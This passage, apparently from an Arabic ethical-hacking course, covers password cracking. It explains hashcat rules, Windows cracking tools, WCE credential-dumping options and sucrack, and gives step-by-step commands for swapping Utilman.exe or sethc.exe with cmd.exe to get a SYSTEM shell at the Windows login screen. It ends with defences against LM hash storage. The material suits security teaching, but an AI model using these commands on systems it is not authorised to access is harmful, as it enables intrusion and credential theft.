ﻣﻌظﻣﮭﺎ ﻻ ﺗﺣﺗﺎج إﻟﻰ ﺷرح Combination Attack .ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﺟﻣﻊ ﺑﯾن ﻛﻠﻣﺎت ﻣن اﻟﻘواﻣﯾس ﻹﻧﺷﺎء ﻛﻠﻣﺎت ﺟدﯾدة.
Rule based attacks -2
ھﻲ ﻣﻔﯾدة ﺟدا .ﺣﯾث ﯾﻣﻠك hashcatﻗﺎﺋﻣﺔ ﻣن اﻟﻘواﻋد اﻟﺗﻲ ﺑﻧﯾت واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ھﻧﺎك ﻗﺎﻋدة
" "leetوھﻲ ﻣﺟﻣوﻋﺔ اﻟﻘواﻋد اﻟﺗﻲ ﺗﺄﺧذ ﻛل ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﺗﻠﻘﺎﺋﯾﺎ وﺗﺣﺎول اﺻدار ﻣﺧﺗﻠف ﻣن اﻟﻛﻠﻣﺎت .leet-speak versionsﯾﻣﻛﻧك
اﯾﺿﺎ اﺳﺗﺧدام Rule based attackﻣﺛل ﻟﻐﺎت اﻟﺑرﻣﺟﺔ ﻹﻧﺷﺎء rulesetsاﻟﺧﺎﺻﺔ ﺑك .ﯾﺗم ﺗﻣﻛﯾن ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر
) (-rﺛم اﺳم rulesاﻟﺗﻲ ﺗرﯾدھﺎ.
ﻣن أﺷﮭر ھذه rulesﻛﺎﻻﺗﻰ:
Best64.rule, passwordspro.rule, d3ad0ne.rule, and leetspeak.rule
ﯾﻣﻛﻧك أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ ﻣزﯾد ﻣن اﻟﻘواﻋد ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ:
http://hashcat.net/wiki/doku.php?id=rule_based_attack
ﯾﺳﺗﺧدم ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣﻊ Brute force attackوﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﮫ ﺑﺎﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ )(Charsetاﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ :Mask attack
ﯾﻣﻛﻧك أﯾﺿﺎ ﺗﺧﺻﯾص ھذه اﻟرﻣوز ) .(Charsetﻟﺗﺣدﯾد ﻣﺟﻣوﻋﺔ اﻻﺣرف اﻟﺗﻲ ﺗرﯾد ﺗﺧﺻﯾﺻﮭﺎ ) ،(custom charsetﻓﻧﺣن ﺑﺣﺎﺟﮫ
ﻻﺳﺗﺧدام اﻟﺧﯾﺎر) .(-1ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻌدﯾد ﻣن ﺗﺧﺻﯾص اﻻﺣرف ) (custom charsetﻛﻣﺎ ﺗرﯾد طﺎﻟﻣﺎ ﺗم ﺗﺣدﯾدھﺎ ﻣﻊ اﻟﻌدد ).(1-n
ﯾﺗم ﺗﻣﺛﯾل ﻛل ﺣرف ﻣﺧﺻص ﺑﺎﻟﻌﻼﻣﺔ اﻻﺳﺗﻔﮭﺎم )؟( وﯾﺗﺑﻌﮫ ﻧوع اﻟﺣرف.
أﻣﺛﻠﮫ
OclHashcat
ﺗدﻋم اﻟﺗوﻗف-ﺗدﻋم ﻛروت اﻟﺷﺎﺷﺔ اﻟﻣﺧﺗﻠﻔﺔ- ﺗدﻋم اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ- ﻣﺟﺎﻧﯾﺔ:ﻣن اﻗوى وأﺳرع اﻷدوات ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ
. ﻧوﻋﺎ ﻣن اﻧواع اﻟﮭﺎش50 ﺗدﻋم أﻛﺛر ﻣن- ﺗدﻋم أﻛﺛر ﻣن طرﯾﻘﺔ ھﺟوم-واﻻﺳﺗﻣرار
ﺑﺎﻹﺿﺎﻓﺔ اﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل.GPU وﻟﻛﻧﮭﺎ ﺗﺧﺗﻠف ﻋﻧﮭﺎ ﺑﺗدﻋﯾﻣﮭﺎ اﺳﺗﺧدامhashcat ﺗﺳﺗﺧدم ﻧﻔس اﻟﺧﯾﺎرات اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ اﻷداة
.وﯾﻧدوز ﺑﺟﺎﻧب اﻟﻠﯾﻧﻛس
، ﻣﺳؤول اﻟدوﻣﯾن،أدوات ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﺗﺳﻣﺢ ﻟك ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت ﻣرور ﻟﻣﺳؤول ﻏﯾر ﻣﻌروف أو ﺗم ﻓﻘداﻧﮭﺎ ﻋﻠﻰ اﻟﻣﺳﺗوى اﻟﻣﺣﻠﻲ
ﺣﺗﻰ أﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﻠوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻣؤﻣن ﻋﻠﻰ اﻟﻔور دون.وﻏﯾرھﺎ ﻣن ﻛﻠﻣﺎت ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم
: وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ. ﻓﻲ ﺣﺎﻟﺔ ﻧﺳﯾﺎن ﻛﻠﻣﺔ اﻟﺳر،إﻋﺎدة ﺗﺛﺑﯾت وﯾﻧدوز
Password Unlocker Bundle available at http://www.passwordunlocker.com
Proactive System Password Recovery available at http://www.elcomsoft.com
Windows Password Cracker available at http://www.windows-password-cracker.com
WinPassword available at http://lastbit.com/
Passware Kit Enterprise available at http://www.lostpassword.com
PasswordsPro available at http://www.insidepro.com
LSASecretsView available at http://www.nirsoft.net
LCP available at http://www.lcpsoft.com
Password Cracker available at http://www.amlpages.com
Kon-Boot available at http://www.thelead82.com
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Hash Suite available at http://hashsuite.openwall.net
SAMlnside available at http://www.insidepro.com
Windows Password Recovery available at http://www.passcape.com
Password Recovery Bundle available at http://www.top-password.com
ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑواﺳطﺔ ﻣﮭﺎﺟم ذات اﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ ﺣﻘﻧﮭﺎ ﻓﻲ ﻧظﺎم اﻟوﯾﻧدوز اﻟﮭدف ﺑواﺳطﺔ
meterpreterﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ .hashdump7
ﯾوﺟد ﻧﺳﺧﮫ ﻣن ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺳﺎر /usr/share/wceواﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز.
اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮫ ﻛﺎﻻﺗﻰ:
]C:\cwe\> cwe.exe [options
ﻣﺛﺎل:
-r List logon sessions and NTLM credentials indefinitely. Refresh every 5 seconds if new sessions.
ﺗﺳﺗﺧدم ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ اﻟوﯾﻧدوز واﻟﮭﺎش اﻟﺧﺎص ﺑﮫ .ﺛم ﺗﻘوم ﺑﻌﻣل ﻓﺣص ﻛل 5ﺛواﻧﻲ ﻟﺗﺳﺟﯾل أي ﺟﻠﺳﺔ دﺧول
ﺟدﯾده.
-c Run in a new session with the specified NTLM credentials.
اﻧﺷﺎء ﺟﻠﺳﺔ ﺟدﯾده ﻣﻊ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ھﺎش ﻣﻌﯾن.
-e List logon sessions NTLM credentials indefinitely. Refresh every time a logon event occurs.
ﻣﺛل اﻟﺧﯾﺎر ) (-rوﻟﻛن ﯾﺗم إﻋﺎدة اﻟﻔﺣص ﻛﻠﻣﺎ ﻧﺷﺎء ﺗﺳﺟﯾل دﺧول ﺟدﯾد.
>-o <file save all output to a file.
ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع NTLMﻟﻛﻣﻠﺔ ﻣرور ﻣﻌﯾﻧﮫ ﯾﺗم ذﻟك ﻋن طرﯾﻖ اﻻﺗﻲ:
>wce.exe -g <cleartext password
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa
)(hernan@ampliasecurity.com
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7
CmosPwd
ﯾﺳﺗﺧدم CmosPwdﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور CmosPwd .(Basic Input Output System)BIOSﯾﺗﯾﺢ ﻟك ﻣﺣو/ﻗﺗل ،اﻟﻧﺳﺦ
اﻻﺣﺗﯾﺎطﻲ ،او اﺳﺗﻌﺎدة .CMOS
SUCrackﯾﻤﻜﻨﮫ إدارة اﻟﻌﺪﯾﺪ ﻣﻦ اﻟﻌﻤﻠﯿﺎت ﻓﻲ وﻗﺖ واﺣﺪ ,وﻟﻜﻦ ﯾﻔﻀﻞ اﺳﺘﺨﺪام واﺣﺪ ﻓﻘﻂ ﺣﯿﺚ ﻛﻠﻤﺎ ﻓﺸﻠﺖ ﻣﺤﺎوﻟﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﻌﺎدة ﻣﺎ
ﯾﺘﺴﺒﺐ ﺗﺄﺧﯿﺮ ﺛﻼﺛﺔ ﺛﻮاﻧﻲ ﻗﺒﻞ ﻣﺤﺎوﻟﺔ إدﺧﺎل ﻛﻠﻤﺔ ﻣﺮور أﺧﺮى.
ﻛﯿﻒ ﻧﻔﻌﻞ ذﻟﻚ ...
-1ﻣﻦ اﺟﻞ اﺳﺘﺨﺪام ، SUCrackﯾﺠﺐ ﻋﻠﯿﻚ ﺗﺤﺪﯾﺪ ﻟﻮاﺋﺢ اﻟﻜﻠﻤﺎت ﻋﻨﺪ ﻓﺘﺤﮫ .ﺧﻼف ذﻟﻚ ،ﺳﻮف ﺗﺤﺼﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻄﺎ .ﻓﺘﺢ ﻧﺎﻓﺬة
اﻟﺘﺮﻣﻨﺎل وﺗﻨﻔﯿﺬ اﻷﻣﺮ sucrackﻛﺎﻻﺗﻰ:
#sucrack /usr/share/wordlists/rockyou.txt
-2إذا ﻛﻨﺖ ﺗﺮﻏﺐ ﻓﻲ ﺟﻌﻞ sucrackﯾﻘﻮم ﺑﻌﻤﻠﯿﺘﯿﻦ ﻓﻲ وﻗﺖ واﺣﺪ ،وﺗﺮﻏﺐ ﻓﻲ ﻋﺮض اﻻﺣﺼﺎءات ﻛﻞ 6ﺛﻮان ،وﺗﺮﻏﺐ ﻓﻲ ﺗﻌﯿﯿﻦ
رﻣﻮز ANSI escapeﻻﺳﺘﺨﺪاﻣﮭﺎ ،ﯾﻤﻜﻨﻚ اﺳﺘﺨﺪام اﻷﻣﺮ اﻟﺘﺎﻟﻲ:
#sucrack –w 2 –s 6 –a /usr/share/wordlists/rockyou.txt
ﺗﺠﺎوز ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ Windowsﺗﺄﺗﻲ ﻓﻲ ﻣﺘﻨﺎول اﻟﯿﺪﯾﻦ إذا ان ﻋﻤﻼﺋﻨﺎ ﻗﺪ ﻧﺴﻮا ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﮭﻢ ﻟﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل أو ﺗﻢ ﺗﻠﻒ
ﻣﻠﻔﺎت ﺗﻌﺮﯾﻒ اﻟﻤﺴﺘﺨﺪم اﻟﺨﺎﺻﺔ ﺑﮭﻢ أو ﯾﻮﺟﺪ ﺗﺪﺧﻞ ﻣﻦ اﻟﺘﻄﺒﯿﻘﺎت اﻟﺨﺒﯿﺜﺔ )(malwareﻣﻊ اﻟﻨﻈﺎم ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل.
ﯾﻌﻤﻞ ھﺬا ﻷن اﻟﻤﺴﺘﺨﺪم ﯾﻤﻜﻦ أن ﺗﺆدي Utilmanﻋﻦ طﺮﯾﻖ اﻟﻀﻐﻂ ﻋﻠﻰ ﻣﻔﺘﺎح وﯾﻨﺪوز U +ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ وﯾﻨﺪوز .ﺣﯿﺚ ھﺬا
ﺳﻮف ﯾﻘﻮم ﺑﺘﺸﻐﯿﻞ ﻣﻠﻒ Utilman.exeاﻟﻘﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﻟﺬي ﯾﺘﻮاﺟﺪ ﻓﻲ اﻟﻤﺠﻠﺪ . Windows\System32إذا ﻗﻤﺖ ﺑﺘﺒﺪﯾﻞ اﻟﻤﻠﻒUtilman.exe
ﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ ، cmd.exeﻓﺴﻮف ﯾﻜﻮن ﻟﺪﯾﻚ ﺣﻖ اﻟﻮﺻﻮل إﻟﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻊ اﻣﺘﯿﺎزات اﻟﻨﻈﺎم ) .(system privilegesﺣﺴﺎب
اﻣﺘﯿﺎزات اﻟﻨﻈﺎم ) (system privilegesھﻮ أﻋﻠﻰ اﻣﺘﯿﺎزات ﻣﻤﻜﻨﮫ ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز واﻟﺘﻲ ھﻲ ﻣﻤﺎﺛﻠﮫ ﻟﻠﺤﺴﺎب rootﻓﻲ أﻧﻈﻤﺔ
.linux
-أوﻻً وﻗﺒﻞ ﻛﻞ ﺷﻲء ،ﺳﻮف ﺗﺤﺘﺎج إﻟﻰ وﺳﯿﻠﺔ ﻟﻠﻮﺻﻮل إﻟﻰ ﻧﻈﺎم اﻟﻤﻠﻔﺎت ﻟﻤﺒﺎدﻟﺔ Utilman.exeﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ. cmd.exe
وھﻨﺎك ﻋﺪد ﻗﻠﯿﻞ ﻣﻦ اﻟﻄﺮق اﻟﺘﻲ ﺗﺤﻘﻖ ذﻟﻚ:
إزاﻟﺔ اﻟﻘﺮص اﻟﺼﻠﺐ اﻟﺬي ﯾﺤﺘﻮي ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻨﻈﺎم اﻟﻤﺴﺘﮭﺪف وﺟﻌﻠﮫ ﻗﺮص ﺛﺎﻧﻮي ) (slaveﻓﻲ ﻧﻈﺎم آﺧﺮ .وﻣﻦ
ھﻨﺎك ﯾﻤﻜﻨﻚ ﻣﺒﺎدﻟﺔ اﻟﻤﻠﻔﺎت اﻟﻤﻮﺟﻮدة.
اﺳﺘﺨﺪام "ﻗﺮص اﻟﺘﻤﮭﯿﺪ" ﻣﺜﻞ UBCD4Winواﺳﺘﺨﺪام ﺑﺮاﻣﺞ إدارة ﻣﻠﻒ ھﻨﺎك او Live kali CDﻛﻤﺎ ﺗﺤﺪﺛﻨﺎ ﻋﻨﮫ ﺳﺎﺑﻘﺎ.
اﺳﺘﺨﺪام أﺳﻄﻮاﻧﺔ DVDاو CDاﻟﺬي ﺗﺤﺘﻮي ﻋﻠﻰ وﯾﻨﺪوز Vistaأو 7او .8
ﻟﻘﺪ ﺗﻜﻠﻤﺎن ﺳﺎﺑﻘﺎ اﻟﻰ ﻛﯿﻔﯿﺔ اﺳﺘﺨﺪام Live kali CDاﻣﺎ ھﻨﺎ ﺳﻮف ﻧﺴﺘﺨﺪم طﺮﯾﻘﺔ أﺧﺮى ﺣﯿﺚ ﻓﻲ ھﺬا اﻟﻤﺜﺎل ﺳﻮف ﻧﺴﺘﺨﺪم -
"وﯾﻨﺪوز ."DVD 7ﻟﻠﺒﺪء ،اﻟﺘﻤﮭﯿﺪ ﻣﻦ ﻗﺮص DVDاﻟﺨﺎص ب Windows 7وﻋﻨﺪ اﻟﻮﺻﻮل إﻟﻰ اﻟﺸﺎﺷﺔ اﻷوﻟﻰ ﯾﺴﺄل ﻋﻦ اﻟﻠﻐﺔ
واﻟﻌﻤﻠﺔ وﺗﻨﺴﯿﻖ ﻟﻮﺣﺔ اﻟﻤﻔﺎﺗﯿﺢ ،اﻧﻘﺮ ﻓﻮق .NEXT
ﻓﻲ اﻟﺼﻔﺤﺔ اﻟﺘﺎﻟﯿﺔ ،أﺳﻔﻞ اﻟﺻﻔﺣﺔ ﻓﻲ اﻟﺠﺎﻧﺐ اﻷﯾﺴﺮ اﻟﺴﻔﻠﻲ ،اﻧﻘﺮ ﻓﻮق اﻻرﺗﺒﺎط "." Repair your computer -
اﻟﺨﻄﻮة ﺗﺎﻟﯿﺔ ،ﻧﺤﺪد " . “Use recovery tools that can help fix problems starting Windowsﺛﻢ ﻧﺤﺪد ﻧﻈﺎم -
اﻟﺘﺸﻐﯿﻞ إﺻﻼح ،ﺑﻌﺪ اﺧﺘﺮ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻘﺎﺋﻤﺔ ،ﻧﻨﻘﺮ ﻓﻮق .Next
ﺳﯿﻜﻮن اﻻن ﻟﺪﯾﻚ ﺧﯿﺎر " ." Choose a recovery toolﻧﺤﺪد ﻣﻮﺟﮫ اﻷواﻣﺮ). (Command prompt -
ﺗﻜﻮن اﻻن ﻗﺪ ﻓﺘﺤﺖ "ﻧﺎﻓﺬة ﻣﻮﺟﮫ اﻷواﻣﺮ" .ﻧﻜﺘﺐ اﻷواﻣﺮ اﻟﺘﺎﻟﯿﺔ: -
\C:
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe
ﺣﯿﺚ ھﺬا ﺳﻮف ﯾﻨﺘﻘﻞ اﻟﻰ اﻟﻤﺠﻠﺪ system32ﺛﻢ ﯾﻘﻮم إﻋﺎدة ﺗﺴﻤﯿﺔ اﻟﻤﻠﻒ اﻷﺻﻠﻲ Utilman.exeاﻟﻰ أي اﺳﻢ اﺧﺮ ﺛﻢ ﯾﺄﺧﺬ ﻧﺴﺨﮫ ﻣﻦ اﻟﻤﻠﻒ
cmd.exeوﯾﻌﯿﺪ ﺗﺴﻤﯿﺘﮭﺎ اﻟﻰ Utilman.exeﻟﺘﺼﺒﺢ ھﻲ اﻟﻤﻠﻒ اﻟﺒﺪﯾﻞ ﻟﻠﻤﻒ اﻷﺻﻠﻲ.
ﺣﯿﺚ ان اﻟﻔﻜﺮة ﻗﺎﺋﻤﮫ ﻋﻠﻰ اﺳﺘﺒﺪال اﻟﻤﻠﻒ Utilman.exeﺑﻤﻮﺟﮫ اﻷواﻣﺮ cmd.exeﻋﻦ طﺮﯾﻖ ﺗﻐﯿﺮ اﻷﺳﻤﺎء ﻓﻘﻂ وﯾﻤﻜﻦ أﯾﻀﺎ اﺳﺘﺒﺪاﻟﮫ ﺑﺄي
ﻣﻠﻒ ﻗﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﺧﺮ.
ﺑﻤﺠﺮد ﺗﺸﻐﯿﻞ اﻟﻜﻤﺒﯿﻮﺗﺮ ﺑﺎﻟﻄﺮﯾﻘﺔ اﻟﻌﺎدﯾﺔ ،ﻧﻨﻘﺮ ﻓﻮق ﺗﺮﻛﯿﺒﺔ اﻟﻤﻔﺎﺗﯿﺢ Windows + Uواﻟﺘﻲ ﺗﺆدى اﻟﻰ اﻟﺤﺼﻮل ﻋﻠﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ .إذا ﻟﻢ
ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ ،ﻧﻨﻘﺮ ﻓﻮق Alt + Tabﺣﯿﺚ ﻗﺪ ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻦ وراء ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل .ﻣﻦ ھﻨﺎ ،ﯾﻤﻜﻨﻚ ﺗﺸﻐﯿﻞ اﻟﻜﺜﯿﺮ )أن
ﻟﻢ ﯾﻜﻦ ﻛﻠﮭﺎ( ﻣﻦ اﻷواﻣﺮ اﻟﺘﻲ ﯾﻤﻜﻦ اﺳﺘﺨﺪاﻣﮭﺎ ﻋﺎدة ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ.
اﻟﺘﻌﺪﯾﻞ ﻋﻠﻰ اﻟﻤﻠﻒ " "Sethc.exeﺑﻨﻔﺲ اﻟﻄﺮﯾﻘﺔ اﻟﺴﺎﺑﻘﺔ ﯾﺴﻤﺢ أﯾﻀﺎ ﻟﻚ ﺑﺘﺠﺎوز ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻟﻮﯾﻨﺪوز .واﻟﻤﻠﻒ" "sethc.exeھﻮ
ﻟﻮظﯿﻔﺔ .Windows Sticky Keysﻓﻲ إطﺎر اﻟﻌﻤﻠﯿﺔ اﻟﻌﺎدﯾﺔ ،إذا ﻗﻤﺖ ﺑﺎﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح Shiftﺧﻤﺲ ﻣﺮات ﻋﻠﻰ اﻟﺘﻮاﻟﻲ ،ﻓﮭﺬا ﺳﻮف
ﯾﺆدى اﻟﻰ ظﮭﻮر ﻣﺮﺑﻊ اﻟﺤﻮار .sticky key dialog boxﺑﺎﺳﺘﺨﺪام ﻧﻔﺲ اﻟﻄﺮﯾﻖ اﻟﺴﺎﺑﻘﺔ واﻟﺘﻲ ﻗﻤﻨﺎ ﺑﮭﺎ ﻣﻊ ،Utilman.exeﻓﺒﻤﺠﺮد
اﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح shiftﺧﻤﺲ ﻣﺮات ﻓﻲ ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﺎﻧﮫ ﯾﺆدى اﻟﻰ ﻓﺘﺢ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻋﻠﻰ ﻣﺴﺘﻮى اﻟﻨﻈﺎم.
LM Hash Backward Compatibilityھو ﺧﺎدم ﯾﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل Windows 2000و Windows Server 2003و
ﯾﻣﻛﻧﮫ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺗﻲ ﺗﻘوم ﺑﺗﺷﻐﯾل ﺟﻣﯾﻊ إﺻدارات وﯾﻧدوز .ﻋﻣﻼء Windows 95/98ﻻ ﺗﺳﺗﺧدم Kerberosﻓﻲ اﻟﻣﺻﺎدﻗﺔ.
ﻣن أﺟل ،Backward Compatibilityﻓﺎن وﯾﻧدوز 2000و Windows Server 2003ﺗدﻋم اﻻﺗﻲ:
LAN Manager (LM) authentication
Windows NT (NTLM) authentication
NTLM version 2 (NTLMv2) authentication
ﯾﺗم اﺳﺗﺧدام (Unicode hash) NT Hashﻓﻲ NTLMv2 ،NTLMv1و .Kerberosﯾﺳﺗﺧدم ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ ."LM hash" LM
ﻻ ﺗﻘم ﺑﺗﺧزﯾن ،LM hashإذا ﻟم ﯾﻛن ﺿرورﯾﺎ ،ﻣن أﺟل اﻟﺗواﻓﻖ ﻣﻊ اﻹﺻدارات اﻟﺳﺎﺑﻘﺔ .إذا ﺗم ﺗﺧزﯾن ،LM hashﻓﺎن ﻋﻣﻼء ﺷﺑﻛﺎت
Windows98 ،Windows95أو ﻣﺎﻛﻧﺗوش ﻗد ﺗواﺟﮫ ﻣﺷﺎﻛل اﻟﺗواﻓﻖ.
(Implement the NoLMHash Policy by Using a Group Policy) Group policy ﺑﺎﺳﺗﺧدامNoLMHash ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ-1
: ﻧﺗﺑﻊ اﻟﺧطوات ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ،local group policy ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﻧﮭﺞSAM ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎتLM hash ﻟﺗﻌطﯾل ﺗﺧزﯾن
- In Windows version In Control Panel Administrative Tools Local Security Policy Local
Policies Security Options.
- In Windows server version In Group policy, select Computer Configuration Windows Setting
Security Setting Local Policies Security Options.
- In the list of available policies, double-click Network security: Do not store LAN Manager Hash
value on next password change
- Click Enabled Ok
.8 و7 وﺗﻛون ﻓﻲ ھذا اﻟوﺿﻊ اﻓﺗراﺿﯾﺎ ﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑداﯾﺔ ﻣن ﻓﯾﺳﺗﺎ وEnable ﻛﻣﺎ ﻧﻼﺣظ ﯾﺟب ان ﺗﻛون ﻓﻲ وﺿﻊ
(Implement the NoLMHash Policy by Editing the Registry) ﻋن طرﯾﻖ ﺗﻌدﯾل ﻣﻠف اﻟﺳﺟلNoLMHash ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ-2
registry وذﻟك ﻋن طرﯾﻖ إﯾﺟﺎد اﻟﻣﻔﺗﺎح اﻟﺗﺎﻟﻲ ﻓﻲ ﻣﻠف
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash ﺛم ﻧﻘوم ﺑﺈﺿﺎﻓﺔ ﻣﻔﺗﺎح
-3ﻧﺳﺗﺧدم ﻛﻠﻣﺎت ﻣرور واﻟﺗﻲ ﻋﻠﻰ اﻷﻗل أﻛﺑر ﻣن 15ﻗﯾﻣﺔ )(Use a Password that is at Least 15 Characters Long
ﺣﯾث ان ﻧواﻓذ اﻟوﯾﻧدوز ﺗﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺻورة LM HASHواﻟﺗﻲ ﺗﻛون اﻗل ﻣن 15ﺣرف اﻣﺎ ﻣﺎ ﯾزﯾد ﻓﻠن ﯾﺳﺗطﯾﻊ
ﺗﺧزﯾﻧﮫ ﻓﻲ ﺻورة LM hashﺣﯾث ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﺳﻌﺗﮫ 14ﺣرف ﻓﻘط.
ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور How to Defend Against Password Cracking
ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ) ،(Password Crackingواﻟﻣﻌروف أﯾﺿﺎ ،Password Hackingھو ﻣﺻطﻠﺢ ﯾﺳﺗﺧدم ﻟﺗﺣدﯾد ﻋﻣﻠﯾﺔ اﻛﺗﺳﺎب
اﻻﺳﺗﺧدام اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻟﻠﺷﺑﻛﺔ ،ﻧظﺎم ،أو اﻟﻣوارد اﻟﺗﻲ ﯾﺗم ﺗﺄﻣﯾﻧﮭﺎ ﻣﻊ ﻛﻠﻣﺔ ﻣرور .اﻟطرﯾﻘﺔ اﻷﺳﺎﺳﯾﺔ ﻟﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور ھو ﺗﺧﻣﯾن ﻛﻠﻣﺔ
اﻟﻣرور .طرﯾﻘﺔ أﺧرى ھﻲ ﻣﺣﺎوﻟﺔ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﻣرارا وﺗﻛرارا .ﯾﺗم ذﻟك ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﺣﯾث اﻟﻛﻣﺑﯾوﺗر ﯾﺣﺎول ﺗوﻟﯾﻔﺎت
ﻣﺧﺗﻠﻔﺔ ﻣن اﻷﺣرف وﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﻣزﯾﺞ ﻧﺎﺟﺢ .إذا ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﺿﻌﯾﻔﺔ ،وﻣن ﺛم ﯾﻣﻛن ان ﺗﺻدع ﺑﺳﮭوﻟﺔ .ﻣن أﺟل ﺗﺟﻧب ﻣﺧﺎطر
